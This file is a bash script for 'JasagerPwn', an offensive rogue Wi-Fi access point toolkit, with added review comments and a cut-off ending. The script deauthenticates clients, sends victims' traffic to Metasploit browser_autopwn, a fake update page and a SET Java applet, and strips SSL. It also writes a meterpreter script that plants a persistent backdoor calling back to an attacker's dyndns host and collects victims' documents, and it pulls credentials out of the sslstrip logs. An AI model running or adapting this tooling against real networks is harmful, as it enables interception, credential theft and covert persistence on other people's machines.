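#!/bin/bash
#leg3nd's JasagerPwn Attack - v1.1 - rev44
#
# NOTE(review): this is an offensive rogue-AP toolkit (Jasager/Pineapple + MITM). It rewrites the
# host's iptables, DHCP and resolv.conf, intercepts victim traffic (sslstrip) and, with
# autoMetScript=1 below, plants a persistent meterpreter backdoor on every exploited client.
# Use it only with explicit, written authorisation covering the networks and clients involved.
#
#ATTACKS - browserPwn  - Redirect LAN to Metasploit's auxiliary browser_autopwn module for sessions
#        - FakeUpdate  - Redirect LAN to a fake update page that serves a metasploit payload download.
#        - Java Applet - Redirects LAN to a java applet with a meterpreter payload, via SET.
#        - Sniffer     - Just picks up traffic with no ARP poisoning, plus SSL stripping (sslstrip)
#        - DeAuth      - Deauths nearby clients from their APs and tries to make them join yours
#
#Allows control of transparency of all attacks via built in bash menu.
# Requires: Aircrack-ng suite (w/ airdrop-ng), Metasploit Framework, Social Engineering Toolkit, Dsniff suite
#           Apache2, working ruby and python, Injection, DHCP3, SSLstrip, PHP5, Macchanger.
#
# Created for and tested with an RTL8187 monitor mode card, and an open-WRT Fon+ (Pineapple).
# For More Information refer to INSTALL_HOWTO, usage information -h / -?

#SCRIPT CONFIGURATION BELOW - ADJUST TO YOUR WIFI CONFIGURATION
IFACE="usb0"                #Connection to the internet (gateway), EG wlan0,eth1,usb0,ppp0,etc (override with -i)
WiFiMODE="0"                #Use WiFi For Internet Gateway (creates a DeAuth rule so you don't own yourself) EG 0,1 (override with -d)
fonIP="192.168.10.2"        #Fon router Iface IP, this is HARDCODED to 192.168.10.0 subnet.
FONIFACE="eth0"             #Interface facing the Jasager router
WIFACE="wlan0"              #Wireless Interface, EG wlan0,ath0,wifi0 (override with -w)
MIFACE="mon0"               #Monitor Interface for Attacks (created from $WIFACE by airmon-ng)
#Macchanger, ONLY FOR ATTACK INTERFACES
macMode="set"               #Mac spoofing mode - set / random (case sensitive) (override with -m)
fakeMac="00:e0:f7:99:e1:30" # 00:e0:f7:99:e1:30 (Cisco Systems, Inc. OUI) (override with -s)
ourAPmac="00:12:CF:A4:92:B1" #Pineapple MAC so we dont DeAuth Ourselves! Set this to YOUR AP's real MAC;
                            # presumably it is the DeAuth exclusion, so a stale value means you deauth your own clients.
msfpath="/pentest/exploits/framework3" #Metasploit Location (if not BT4, use msf3 directory)
SETpath="/pentest/exploits/SET"        #Social Engineering Toolkit Location
DomainName="Networking.com"            #Domain name for DHCP configuration.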
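######################################################################################################################
# Post-exploitation meterpreter script configuration.
# metScript() writes the multi-command file SET feeds to meterpreter after a successful exploit:
# it installs the D-DNS aware persistence backdoor (src/persistence_dns.rb, which this script copies
# into Metasploit) and then harvests documents from the victim.
# NOTE(review): this is a persistent backdoor on someone else's machine -- leave autoMetScript at 0
# unless the engagement's rules explicitly permit persistence.
autoMetScript="0"          # 1 = automatically run the meterpreter persistence script on the victim (override with -a)
Pport="31337"              # persistence backdoor callback port (override with -p)
PersIP="Your.dyndns.com"   # your dyndns / no-ip hostname the backdoor calls back to
pwd="$PWD"                 # launch directory; harvested files land under $pwd/collected__$NOW

# Write the meterpreter multi-script consumed by SET (one meterpreter command per line).
# Globals read: SETpath, PersIP, Pport, pwd, NOW (NOW is assigned below, before any attack runs).
function metScript(){
  local metFile="$SETpath/src/program_junk/multi_meter.file"
  if [ -e "$metFile" ] ; then rm -- "$metFile" ; fi
  # EDIT METERPRETER SCRIPT BELOW THIS
  # persistence_dns: -i 60 retry interval (s), -X autostart at boot, -A start a matching handler.
  echo -e "persistence_dns -r $PersIP -p $Pport -i 60 -X -A
file_collector -d c:\\Users\\ -r -f *.doc|*.pdf|*.xls|*.docx| -o /tmp/files
file_collector -i /tmp/files -l $pwd/collected__$NOW
" > "$metFile"
}
####END SCRIPT CONFIG######
#====================================================================================================================
#####################################################################################################################
# Option parsing.
# -h/-u/-U and unknown options need help(), update() and Fupdate(), which are defined further down
# this file. bash only knows a function once its definition has executed, so the original direct
# calls here died with "command not found". The requested action is recorded and dispatched once
# every function (and googleRev) exists -- see the "deferred option actions" case statement below.
# -h takes no argument (it was declared as "h:" before, so a bare -h produced a getopts error).
optAction=""
while getopts "a:p:i:w:m:s:d:huU" OPTIONS; do
  case ${OPTIONS} in
    a ) autoMetScript=$OPTARG ;;
    p ) Pport=$OPTARG ;;
    d ) WiFiMODE=$OPTARG ;;
    i ) IFACE=$OPTARG ;;
    w ) WIFACE=$OPTARG ;;
    h ) optAction="help" ;;
    m ) macMode=$OPTARG ;;
    s ) fakeMac=$OPTARG ;;
    u ) optAction="update" ;;
    U ) optAction="Fupdate" ;;
    \? ) optAction="help" ;;   # getopts reports an unknown option as '?'
    * ) echo -e "\e[01;31m[!]\e[00m Error: Unknown Switch Option" 1>&2 ;; # Default
  esac
done

#SCRIPT VARIABLES - DO NOT TOUCH - HARDCODED AND SENSITIVE
#REQUIRED CHECKS FOR FUNCTIONALITY
version="1.1"
rev="44"
Fwww="/var/www/fakeupdate"   # fake-update attack document root
Jwww="/var/www/javapwn"      # java-applet attack document root
Gwww="/var/www/google"       # fake google landing page document root
# Upstream default gateway. NOTE(review): the awk getline only returns the right column when the
# 0.0.0.0 route is the LAST line of `route -n`; otherwise this is the *next* route's gateway. Verify
# on your host before relying on the DNS DNAT in IPTABLES().
gatewayIP=$(route -n | awk '/^0.0.0.0/ {getline; print $2}')
# Interface probes: `ifconfig <name>` succeeds only for that exact interface. The previous
# `ifconfig | grep $name` was a substring match (wlan0 also matched wlan01) and could return
# several names, which always failed the equality check below.
WIFcheck=$(ifconfig "$WIFACE" 2>/dev/null | awk 'NR==1 {print $1}')
IFcheck=$(ifconfig "$IFACE" 2>/dev/null | awk 'NR==1 {print $1}')
# Timestamp used in loot/log file names. %M is minutes; the former %m (month) made every file from
# the same day and hour collide.
NOW=$(date +"%b-%d_%H:%M:%S")
sslport="11000"              # local port sslstrip listens on; port 80 is REDIRECTed to it in sslstrip()
SPWD="$PWD"
javasite="1"                 # 1 = serve the google page, 2 = serve the "java required" page (see JavaSite)
sniffing="0"                 # 1 while sslstrip and its log tail are running
wasSniffing="0"
fakeupdate="0"
browserpwn="0"
javaATK="0"
z="1"                        # cleanup() only tears things down while z=1
# 4th character of the monitor interface name ("0" for mon0) when it exists, empty otherwise.
moncheck=$(ifconfig | grep "$MIFACE" | awk '{print $1}' | cut -b 4)
ATKcheck=$(ifconfig | grep "$MIFACE" | awk '{print $1}' | cut -b 4)
# These two parse the old net-tools ifconfig layout ("inet addr:", "HWaddr") used on BT4.
ourIP=$(ifconfig "$FONIFACE" | awk '/inet addr/ {split ($2,A,":"); print A[2]}')
wifiMAC=$(ifconfig "$IFACE" | grep "HWaddr" | awk '{print $5}' | tr "[a-z]" "[A-Z]")
# Latest published revision, scraped from the Google Code SVN listing over plain HTTP.
# NOTE(review): unauthenticated HTTP. Anyone on the path can return a higher number and then feed
# update() a replacement for this script, which runs as root. (The project host is also gone.)
googleRev=$(wget -qO- "http://jasager-pwn.googlecode.com/svn/trunk/" | grep "jasager-pwn - Revision" | awk -F " " '{split ($4,A,":"); print A[1]}')
# Ctrl+C and SIGTERM both run cleanup(), which restores iptables, resolv.conf, dhcpd.conf and SET.
trap 'cleanup' 2 15

#-----------------------------------------------------------------------
# Print usage, showing the currently effective option values, then exit 1.
function help() { #help
echo "
(C)opyright 2011 leg3nd @ www.info-s3curity.com
Usage: bash jasagerPwn -i [interface] -m [random/set] -s [00:11:22:33:44:55] -p [31337] -a [0/1] -w [interface]

Options:
 -a [0/1]        : Auto-Run Meterpreter Script, Customize in script. Current = $autoMetScript
 -p [31337]      : Auto-Run Scripts persistence Port. Current = $Pport
 -i [interface]  : Internet Gateway Interface. Current = $IFACE
 -w [interface]  : WiFi Card Interface. Current = $WIFACE
 -d [0/1]        : WiFi Gateway Mode - Adds DeAuth Rule For Yourself = $WiFiMODE
 -m [random/set] : Change the Attack Interfaces MAC Address. Current = $macMode
 -s [MAC]        : Use this MAC Address. Requires -m. Current = $fakeMac
 -u              : Update script and its resources from Google Code.
 -U              : Update script, SET, and Metasploit.
 -? / -h         : Help Screen and Switches.

More Information In top of script.
For Installation, setup, and more information, please reference the INSTALL file or http://www.hak5.org/forums/index.php?showtopic=19955
"
exit 1
}

# Flush every filter/nat rule and user-defined chain (each step in a popup, as before).
# Both rule sets below are rebuilt from scratch on top of this.
function flushIptables(){
  local cmd
  for cmd in "iptables --flush" "iptables --table nat --flush" "iptables --delete-chain" \
             "iptables --table nat --delete-chain" "iptables -X" "iptables -F"; do
    xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "$cmd"
  done
}

# Transparent NAT mode (Sniffer): forward victim traffic arriving from the Pineapple side
# ($FONIFACE) out through $IFACE, relaying their DNS to the real upstream resolver so the
# victims keep working while we watch. The port-80 -> sslstrip REDIRECT is added by sslstrip().
# Globals read: FONIFACE, IFACE, gatewayIP, fonIP, version.
function IPTABLES(){
  flushIptables
  iptables -P FORWARD ACCEPT
  iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
  iptables -A FORWARD -i "$FONIFACE" -o "$IFACE" -m state --state NEW -j ACCEPT
  if [ -n "$gatewayIP" ]; then
    iptables -t nat -A PREROUTING --in-interface "$FONIFACE" -p udp --dport 53 -j DNAT --to "$gatewayIP"
  fi
  iptables --append FORWARD --in-interface "$FONIFACE" -j ACCEPT
  iptables --table nat --append POSTROUTING --out-interface "$IFACE" -j MASQUERADE
  ifconfig "$FONIFACE" "$fonIP"
}

# Capture mode (browserPwn / FakeUpdate / Java): DNAT *all* TCP and UDP arriving from the Pineapple
# side to this host, so the local Apache/SET/Metasploit listeners receive every victim connection.
# A running sslstrip session is stopped first since its REDIRECT would conflict.
# (A trailing PREROUTING rule with no --jump target was dropped: it only counted packets.)
function ipTableRedirect {
  flushIptables
  sleep 1
  if [ "$sniffing" -eq "1" ] ; then
    [ -n "$TAILPID" ] && kill "$TAILPID" 2>/dev/null
    killall -9 sslstrip 2>/dev/null
    wasSniffing=$sniffing
    sniffing="0"
  fi
  iptables -P FORWARD ACCEPT
  iptables --append FORWARD --in-interface "$FONIFACE" -j ACCEPT
  iptables --table nat --append POSTROUTING --out-interface "$IFACE" -j MASQUERADE
  iptables -t nat -A PREROUTING --in-interface "$FONIFACE" -p udp -j DNAT --to "$fonIP"
  iptables --table nat --append PREROUTING --in-interface "$FONIFACE" --proto tcp --jump DNAT --to "$fonIP"
  iptables --table nat --append PREROUTING --in-interface "$FONIFACE" --jump REDIRECT
  ifconfig "$FONIFACE" "$fonIP"
}

updateURL="http://jasager-pwn.googlecode.com/svn/trunk"

# Download $2 into directory $1 with wget -N, but only if that directory already exists.
fetchInto(){
  if [ -d "$1" ]; then wget -q -N -P "$1" "$2"; fi
}

# Pull the script and its src/www resources from Google Code.
# NOTE(review): plain HTTP, no signature or checksum -- the fetched jasagerPwn is the next thing
# you run as root. Verify it out of band before trusting an update.
# The two URL layouts (trunk/www*/ for the ./src/ copies, trunk/src/www*/ for the /var/www copies)
# are kept exactly as the original had them; which layout the repository really used cannot be
# confirmed here. What was fixed: every download now lands in the directory whose existence was
# just checked (the original wrote ./src/wwwFakeupdate files to ./www/, google files to $Fwww and
# $Jwww, and wwwJava/temp files one level too high).
function fetchResources(){
  local f
  wget -q -N "$updateURL/jasagerPwn"
  wget -q -P "./src/" -N "$updateURL/src/persistence_dns.rb"
  wget -q -P "./src/" -N "$updateURL/src/deauth.sh"
  #FakeUpdate
  for f in "favicon.ico" "index.php" "style.css" "sbd.exe" "vnchooks.dll" "wkv-x64.exe" "wkv-x86.exe" "winvnc.exe" "vnc.reg" ; do
    fetchInto "./src/wwwFakeupdate/" "$updateURL/wwwFakeupdate/$f"
    fetchInto "$Fwww/" "$updateURL/src/wwwFakeupdate/$f"
  done
  #JavaPwn
  for f in "index.template" "index.template.plain" ; do
    fetchInto "./src/wwwJava/" "$updateURL/wwwJava/$f"
    fetchInto "$Jwww/" "$updateURL/src/wwwJava/$f"
  done
  for f in "global.js" "index.jsp" "oo_conf_en-US.js" "oo_engine.js" "popUp.js" "print.css" "s_code_remote.js" "screen.css" ; do
    fetchInto "./src/wwwJava/temp/" "$updateURL/wwwJava/temp/$f"
    fetchInto "$Jwww/temp/" "$updateURL/src/wwwJava/temp/$f"
  done
  #Google
  for f in "index.template" ; do
    fetchInto "./src/wwwGoogle/" "$updateURL/wwwGoogle/$f"
    fetchInto "$Gwww/" "$updateURL/src/wwwGoogle/$f"
  done
  for f in "favicon.ico" "gzip.html" "js1.js" ; do
    fetchInto "./src/wwwGoogle/temp/" "$updateURL/wwwGoogle/temp/$f"
    fetchInto "$Gwww/temp/" "$updateURL/src/wwwGoogle/temp/$f"
  done
}

# Compare the local revision with the scraped Google Code revision and fetch if newer. Always exits:
# 1 on error, 0 otherwise (the original exited 1 on success too, indistinguishable from failure).
function syncFromGoogleCode(){
  case "$googleRev" in
    ''|*[!0-9]*)   # empty or not a number (e.g. an HTML error page) -- never feed it to -lt/-gt
      echo -e "\e[01;31m[!]\e[00m ERROR: Couldn't resolve revision from google.."
      exit 1 ;;
  esac
  if [ "$googleRev" -lt "$rev" ]; then
    echo -e "\e[01;31m[!]\e[00m ERROR: Your revision number is too new.."
    exit 1
  elif [ "$googleRev" -gt "$rev" ]; then
    echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$rev - Updating to rev$googleRev..."
    fetchResources
  else
    echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$rev - Your Already Up To Date!"
  fi
  echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$googleRev - All Done!"
  exit 0
}

#Script update via google code
function update(){
  syncFromGoogleCode
}

#Full update including MSF/SET (their own updaters run first, then the script sync above)
function Fupdate(){
  echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$googleRev - Updating Metasploit.."
  xterm -fg green -bg black -geometry 75x20+0+0 -T "JasagerPwn v$version rev$googleRev - Metaploit Update" -e "cd $msfpath && ./msfupdate"
  echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$googleRev - Updating SET.."
  xterm -fg green -bg black -geometry 75x20-0+0 -T "JasagerPwn v$version rev$googleRev - SET Update" -e "cd $SETpath && python set-update"
  syncFromGoogleCode
}

# Extract credentials from sslstrip.log using cred-collector/definitions.sslstrip.
# Each definitions line is "<label> <url-pattern> <user-field> <pass-field>" (grep regexes). A log
# line matching all three patterns is reduced to "user-field=...  pass-field=..." and appended to
# cred-collector/ssl-collection.log as "<label> - <pair>".
# The log is attacker-captured victim traffic: it is read with grep -a and never eval'd. The
# definitions file is local and trusted; its fields are still interpolated into a sed pattern.
SSLparse(){
  local logPath="$PWD/sslstrip.log"
  local defs="cred-collector/definitions.sslstrip"
  local label urlPat userField passField rest hits
  [ -e "$logPath" ] || return 0
  [ -r "$defs" ] || return 0
  while read -r label urlPat userField passField rest; do
    [ -n "$urlPat" ] || continue
    hits="$(grep -a -- "$urlPat" "$logPath" | grep -a -- "$userField" | grep -a -- "$passField")"
    if [ -n "$hits" ]; then
      echo -n "$label" "- " >> "$PWD/cred-collector/ssl-collection.log"
      # keep from the user field onwards, first '&' becomes a space, drop everything after the next one
      echo "$hits" | sed -e "s/.*$userField=/$userField=/" -e 's/&/ /' -e 's/&.*//' >> "$PWD/cred-collector/ssl-collection.log"
    fi
  done < "$defs"
}

# Swap SET's APACHE_DIRECTORY between the google landing page (javasite=1) and the "java required"
# page (javasite=2) by rewriting line $SETapacheDIR of set_config in place.
# Globals read: javasite, SETpath, SETapacheDIR (line number computed in the main flow).
function JavaSite(){
  local cfg="$SETpath/config/set_config"
  GoogCheck=$(grep "APACHE_DIRECTORY=/var/www/javapwn" "$cfg")
  #1 = google 2 = java required
  if [ "$javasite" -eq "1" ] && [ "$GoogCheck" = "APACHE_DIRECTORY=/var/www/javapwn" ]; then
    sed "${SETapacheDIR}s!APACHE_DIRECTORY=/var/www/javapwn!APACHE_DIRECTORY=/var/www/google!" "$cfg" > "${cfg}J"
    sleep 1
    mv "${cfg}J" "$cfg"
  elif [ "$javasite" -eq "2" ]; then
    sed "${SETapacheDIR}s!APACHE_DIRECTORY=/var/www/google!APACHE_DIRECTORY=/var/www/javapwn!" "$cfg" > "${cfg}G"
    sleep 1
    mv "${cfg}G" "$cfg"
  fi
}

# Start sslstrip on $sslport with port 80 REDIRECTed to it, and tail its log in a window.
# NOTE(review): the REDIRECT has no --in-interface, so port-80 traffic arriving on the uplink is
# redirected too; scoping it with -i $FONIFACE would be tidier but is a behaviour change.
function sslstrip(){
  iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslport"
  xterm -geometry 75x3+1-25 -bg black -fg green -e "sslstrip -l $sslport && sleep 3" &
  if [ ! -e sslstrip.log ]; then touch sslstrip.log; fi
  xterm -geometry 75x24+464+65 -bg black -fg green -T "SSLStrip Sniffing" -e "tail -f sslstrip.log" &
  TAILPID=$!
  sniffing="1"
  wasSniffing=$sniffing
}

# Kill every helper we spawned, flush iptables and restore the files we replaced (/etc/resolv.conf,
# /etc/dhcp3/dhcpd.conf, SET's set_config and templates); archive sslstrip.log under cred-collector/.
# Installed as the SIGINT/SIGTERM handler and called on fatal errors. Always exits 0.
function cleanup() {
  local p f d
  echo
  echo -e "\e[01;32m[>]\e[00m Cleaning up..."
  if [ "$z" = 1 ]; then
    SSLparse && sleep 1
    if test -e /tmp/dhcpd.conf; then rm /tmp/dhcpd.conf; fi
    xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing DriftNET" -e "killall -9 driftnet" &
    xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing SSLStrip" -e "killall -9 sslstrip" &
    xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Apache" -e "/etc/init.d/apache2 stop" &
    # Background helpers by PID, each killed on its own. The original chained the DeAuth PIDs with
    # &&, so one unset or already-dead PID left the rest -- including the ifconfig keep-alive loop
    # ($ipID) -- running after exit. Unset variables simply contribute no word here.
    for p in $DNSID $dsniffID $TAILPID $messageID $AIRDROPID $AIRDUMPID $airID $ipID $dnsID2 $parseID; do
      kill "$p" 2>/dev/null
    done
    xterm -geometry 75x7+10+330 -T "[JasagerPwn-BrowserPwn] v$version - Killing DHCP3" -e "/etc/init.d/dhcp3-server stop"
    xterm -geometry 75x7+10+330 -T "[JasagerPwn-BrowserPwn] v$version - Killing URLSnarf" -e "killall -9 urlsnarf"
    xterm -geometry 75x7+10+330 -T "[JasagerPwn-BrowserPwn] v$version - Killing URLSnarf" -e "killall -9 dsniff"
    xterm -geometry 75x8+100+0 -T "v$version - Killing 'IPtables'" -e "iptables -F" &
    xterm -geometry 75x8+100+0 -T "v$version - Killing 'IPtables'" -e "iptables -X" &
    #Clean up our cfgs. Globs are expanded per file: `[ -e *.png ]` errored with 2+ matches.
    for f in dsniff* *.png; do
      [ -e "$f" ] && rm -- "$f"
    done
    if [ -e "$PWD/dsniff.services" ]; then rm "$PWD/dsniff.services" ; fi
    # Restore SET's java/google templates (the .ORIGINAL copies are made in the main flow).
    for d in java google; do
      if [ -d "$SETpath/src/html/templates/$d/temp/" ]; then rm -rf -- "$SETpath/src/html/templates/$d/temp/" ; fi
      if [ -e "$SETpath/src/html/templates/$d/index.template.ORIGINAL" ] ; then
        mv "$SETpath/src/html/templates/$d/index.template.ORIGINAL" "$SETpath/src/html/templates/$d/index.template"
      fi
    done
    if [ -e "$SETpath/config/set_config.ORIGINAL" ] ; then mv "$SETpath/config/set_config.ORIGINAL" "$SETpath/config/set_config" ; fi
    if [ -e "/etc/dhcp3/dhcpd.conf" ] && [ -e "/etc/dhcp3/dhcpd.conf.ORIGINAL" ] ; then rm /etc/dhcp3/dhcpd.conf && mv /etc/dhcp3/dhcpd.conf.ORIGINAL /etc/dhcp3/dhcpd.conf ; fi
    if [ -e "/etc/resolv.conf" ] && [ -e "/etc/resolv.conf.ORIGINAL" ] ; then rm /etc/resolv.conf && mv /etc/resolv.conf.ORIGINAL /etc/resolv.conf ; fi
    if test -e /tmp/auto-java2; then rm /tmp/auto-java2; fi
    if test -e sslstrip.log; then mv sslstrip.log "$PWD/cred-collector/$NOW-sslstrip.log"; fi
    # Last resort: kill anything else still running under this script's name (including us).
    xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Self" -e "killall -9 jasagerPwn" &
  fi
  echo -e "\e[01;36m[~]\e[00m Exiting with elegance.."
  exit 0
}

# Deferred option actions: every function they need is now defined. Each of these exits.
case "$optAction" in
  help ) help ;;
  update ) update ;;
  Fupdate ) Fupdate ;;
esac

#xterm -geometry 75x8+100+0 -e "ifconfig $WIFACE up && sleep 2"
ifconfig "$WIFACE" up && sleep 1
WIFcheck=$(ifconfig "$WIFACE" 2>/dev/null | awk 'NR==1 {print $1}')
IFcheck=$(ifconfig "$IFACE" 2>/dev/null | awk 'NR==1 {print $1}')
#check for required interfaces BEFORE anything is started in the background, so a fatal exit
#leaves no keep-alive loop behind; exit 1 so a caller can tell failure from success.
if [ "$WIFcheck" != "$WIFACE" ]; then
  echo -e "\e[01;31m[!]\e[00m FATAL: Cannot Locate $WIFACE..." && exit 1
fi
if [ "$IFcheck" != "$IFACE" ]; then
  echo -e "\e[01;31m[!]\e[00m FATAL: Cannot Locate $IFACE..." && exit 1
fi
ifconfig "$FONIFACE" "$fonIP"
#make sure our IP doesnt get screwy from any dhcp.. (re-asserted every 10s; cleanup() kills it via ipID)
while true ; do ifconfig "$FONIFACE" "$fonIP" && sleep 10 ; done &
ipID=$!
gatewayIP=$(route -n | awk '/^0.0.0.0/ {getline; print $2}')
#-----------------------------------------------------------------------
clear
echo
echo
echo ' __------__'
echo ' /~ ~\'
echo ' | //^\//^\| Lets get this show on the road!!'
echo " /~~\ || o| |o|:~\ #! JasagerPwn MultiAttack v$version"
echo ' | |6 ||___|_|_||:| / By leg3nd @ info-s3curity.com'
echo " \__. / o \/ / rev$rev"
echo ' | ( O ) [!] Use At your Own Risk [!]'
echo ' /~~~~\ `\ \ /'
echo ' | |~~\ | ) ~------~`\'
echo ' / | | | / ____ /~~~)\'
echo ' (_/ | | | /. | ( |'
echo ' | | | \ / __)/ \'
echo ' \ \ \ \/ /- \ `\'
echo ' \ \|\ / | |\___|'
echo ' \ | \____/ | |'
echo ' /^~> \ _/ <'
echo ' | | \ \'
echo ' | | \ \ \'
echo ' -^-\ \ | )'
echo ' `\_______/^\______/'
echo
echo
echo -e "\e[01;32m[>]\e[00m Stopping services and programs..."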
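#xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing 'Stopping airmon-ng Interfaces'" -e "airmon-ng stop $MIFACE"
# Stop anything from a previous run (or the distro) that would fight us for the interfaces/ports.
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing 'DHCP3 Service'" -e "/etc/init.d/dhcp3-server stop"
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Sniffing Apps" -e "killall -9 dhcpd3 airbase-ng ettercap sslstrip driftnet urlsnarf"
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing DNS Spoof" -e "killall -9 dnsspoof"
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing WICD" -e "killall -9 wicd"
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing WICD" -e "/etc/init.d/wicd stop" &
sleep 1
echo -e "\e[01;32m[>]\e[00m Checking Environment..."
#test for injection - too glitchy so just got rid of it..
#injection=`aireplay-ng --test $MIFACE -i $MIFACE | sed -n -e ''3'p' | awk '{ print $2, $3, $4 }' | cut -b 1-20`
#if [ "$injection" != "Injection is working" ]; then echo -e "\e[01;31m[!]\e[00m FATAL: $MIFACE Packet Injection Failed.. Try again, or Re-plug it in." && cleanup ; fi

#Check for root (iptables, airmon-ng, /etc edits all need it)
if [ "$(id -u)" != "0" ]; then echo -e "\e[01;31m[!]\e[00m FATAL: Not Root.." && cleanup ; fi

# Check for dependencies, if not install them
# Echo $1 if dpkg reports that exact package as fully installed, nothing otherwise.
# The previous `dpkg -l | grep <name>` was a substring match -- "apache2" was satisfied by
# libapache2-mod-php5, "php5" by any php5-* package -- and also accepted packages in the "rc"
# (removed, config left) state, so missing dependencies were silently skipped.
pkgInstalled(){
  if dpkg-query -W -f='${Status}' "$1" 2>/dev/null | grep -q "install ok installed"; then
    echo "$1"
  fi
}
#Dependencies checks
dhcp3check=$(pkgInstalled dhcp3-server)
apache2check=$(pkgInstalled apache2)
apache2phpcheck=$(pkgInstalled libapache2-mod-php5)
dsniffcheck=$(pkgInstalled dsniff)
php5check=$(pkgInstalled php5)
macchangerCheck=$(pkgInstalled macchanger)
aircrackCheck=$(pkgInstalled aircrack-ng)
sleep 1
if [ -z "$dhcp3check" ] || [ -z "$apache2check" ] || [ -z "$apache2phpcheck" ] || [ -z "$dsniffcheck" ] || [ -z "$php5check" ] || [ -z "$macchangerCheck" ] || [ -z "$aircrackCheck" ] || [ ! -e "/usr/bin/airdrop-ng" ] || [ ! -e "$SETpath/src/payloadgen/pefile.py" ]; then
  echo && echo -e "\e[01;31m[!]\e[00m Some dependencies were not found.. We will try to install them now..." && echo
elif [ ! -e "/usr/local/bin/sslstrip" ] && [ ! -e "/usr/bin/sslstrip" ]; then
  echo && echo -e "\e[01;31m[!]\e[00m Some dependencies were not found.. We will try to install them now..." && echo
fi

# dhcp3-server check (update-rc.d remove: we start/stop it ourselves, it must not autostart)
if [ -z "$dhcp3check" ]; then
  echo -e "\e[01;31m[!]\e[00m No dhcp3-server was detected... Installing.."
  xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install dhcp3-server && update-rc.d -f dhcp3-server remove"
fi
# dsniff check
if [ -z "$dsniffcheck" ]; then
  echo -e "\e[01;31m[!]\e[00m No Dsniff suite was detected... Installing.."
  xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install dsniff"
fi
# apache2 check
if [ -z "$apache2check" ]; then
  echo -e "\e[01;31m[!]\e[00m No apache2 server was detected... Installing.."
  xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install apache2 && update-rc.d -f apache2 remove"
elif [ -z "$apache2phpcheck" ]; then
  echo -e "\e[01;31m[!]\e[00m No apache2 PHP5 module was detected... Installing.."
  xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install libapache2-mod-php5"
fi
# php5 check
if [ -z "$php5check" ]; then
  echo -e "\e[01;31m[!]\e[00m No PHP5 was detected... Installing.."
  xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install php5 php5-curl"
fi
# macchanger check
if [ -z "$macchangerCheck" ]; then
  echo -e "\e[01;31m[!]\e[00m No Macchanger was detected... Installing.."
  xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install macchanger"
fi
# aircrack-ng check (a source install in /usr/local also counts)
if [ -z "$aircrackCheck" ] && [ ! -e "/usr/local/bin/aircrack-ng" ]; then
  echo -e "\e[01;31m[!]\e[00m No Aircrack-ng suite was detected... Installing.."
  xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install aircrack-ng"
fi
#sslstrip check
if [ ! -e "/usr/local/bin/sslstrip" ] && [ ! -e "/usr/bin/sslstrip" ]; then
  # NOTE(review): unauthenticated HTTP download followed by `setup.py install` as root -- a
  # supply-chain hole. No checksum is available in this script to pin the tarball against; at
  # least it is now only unpacked and installed when the download actually succeeded.
  xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install twisted-web linux-headers-$(uname -r) build-essential gcc g++"
  if wget -q -P "/tmp" http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.8.tar.gz \
     && tar xf /tmp/sslstrip-0.8.tar.gz -C "/tmp/"; then
    chmod +x /tmp/sslstrip-0.8/setup.py
    xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "python /tmp/sslstrip-0.8/setup.py install"
  else
    echo -e "\e[01;31m[!]\e[00m ERROR: Could not download sslstrip-0.8.. Install it manually."
  fi
  if [ -d "/tmp/sslstrip-0.8/" ]; then rm -rf /tmp/sslstrip-0.8/ ; fi
fi
#airdrop-ng check
if [ ! -e "/usr/bin/airdrop-ng" ]; then
  if [ -e "/pentest/wireless/airdrop-ng/install.py" ]; then
    xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install python2.6 python2.6-dev python-psyco"
    chmod +x /pentest/wireless/airdrop-ng/install.py
    xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "python /pentest/wireless/airdrop-ng/install.py"
    xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "airdrop-ng -u OUIUPDATE"
  else
    echo -e "\e[01;31m[!]\e[00m ERROR: Cant Find Airdrop-ng Installer.. Do it manually."
  fi
fi
#metasploit check
if [ ! -e "$msfpath/msfconsole" ]; then echo && echo -e "\e[01;31m[!]\e[00m ERROR: Metasploit wasnt found in: $msfpath" && echo && cleanup; fi
#SET check
if [ ! -e "$SETpath/set-automate" ]; then
  echo && echo -e "\e[01;31m[!]\e[00m ERROR: Social Engineering Toolkit wasnt found in: $SETpath" && echo && cleanup
else
  # python pefile module - thanks redmeat_uk
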